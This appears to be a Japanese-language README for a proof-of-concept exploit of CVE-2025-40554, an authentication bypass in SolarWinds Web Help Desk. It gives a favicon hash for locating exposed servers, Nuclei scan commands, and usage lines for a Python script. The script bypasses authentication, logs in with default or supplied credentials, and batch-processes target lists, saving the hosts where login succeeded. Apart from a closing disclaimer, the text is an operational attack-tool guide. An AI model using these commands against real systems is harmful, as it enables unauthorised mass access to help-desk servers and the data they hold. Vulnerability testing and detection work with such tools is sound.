
SolarWinds Web Help Deskの認証バイパスであるCVE-2025-40554の概念実証エクスプロイト。Nucleiテンプレートと、オプションの資格情報ログインを使用した単一またはバッチターゲットテスト用のPythonエクスプロイトを含む。
http.favicon.hash:"1895809524"
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
pip install -r requirements.txt
単一ターゲット(バイパス+ログイン、デフォルト client/client):
python3 exploit_auth_bypass.py -t https://TARGET:8443
カスタム認証情報を使用した単一ターゲット:
python3 exploit_auth_bypass.py -t https://TARGET:8443 -u myuser -p mypass
単一ターゲット、バイパスのみ(ログインなし):
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
ターゲットリスト(脆弱性+ログイン成功のみ保存):
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
カスタム認証情報を使用したターゲットリスト:
python3 exploit_auth_bypass.py -l targets.txt -u admin -p secret
クワイエットモード(ログインに成功したURLのみ表示):
python3 exploit_auth_bypass.py -l result_all.txt -q
このPoCは認可されたセキュリティ研究およびテスト専用です。コンピュータシステムへの不正アクセスは違法です。著者は不正使用について一切責任を負いません。